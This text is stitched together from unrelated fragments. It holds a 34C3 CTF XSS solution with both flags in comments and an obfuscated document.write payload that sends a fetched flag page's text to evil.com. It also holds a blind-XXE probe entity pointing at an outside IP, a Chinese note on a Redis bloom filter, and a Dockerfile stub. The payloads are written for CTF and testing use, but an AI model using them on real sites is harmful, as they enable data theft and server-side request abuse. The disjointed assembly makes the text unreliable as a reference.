| XSS vector: | |
| <link id=foo rel=import href=/flag(1|2)> | |
| <script src="/feed?type=jsonp&cb=payload"></script> | |
| <!-- superblog 1 - flag: 34C3_so_y0u_w3nt_4nd_learned_SOME_javascript_g00d_f0r_y0u --> | |
| <script> | |
| document.write`${Array.call`${atob`PA`}${`l`}${`i`}${`n`}${`k`}${atob`IA`}${`r`}${`e`}${`l`}${atob`PQ`}${atob`Ig`}${`p`}${`r`}${`e`}${`f`}${`e`}${`t`}${`c`}${`h`}${atob`Ig`}${atob`IA`}${`h`}${`r`}${`e`}${`f`}${atob`PQ`}${atob`Ig`}${`h`}${`t`}${`t`}${`p`}${atob`Og`}${atob`Lw`}${atob`Lw`}${`evil`}${atob`Lg`}${`com`}${atob`Og`}${atob`Lw`}${Math.random``}${`_`}${escape.call`${document.getElementsByTagName`link`.item``.import.body.innerText}`}${atob`Ig`}${atob`Pg`}`.join``}`, | |
| </script> | |
| <!-- superblog 2 - flag: 34C3_h3ncef0rth_peopl3_sh4ll_refer_t0_y0u_only_4s_th3_ES6+DOM_guru --> |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
关于bloom filter算法: http://www.cnblogs.com/heaad/archive/2011/01/02/1924195.html
参考项目:
作用:海量数据的去重,时间、空间复杂度为常量:O(K)。
原理:借助redis,维护一个BitSet(位集合)。通过bloom filter算法判断一个数据是否重复。
| FROM python:2.7 | |
| ENV VERSION 1.0.11 | |
| RUN apt-get update && apt-get install -y \ | |
| git --no-install-recommends | |
| RUN mkdir /app | |
| WORKDIR /app |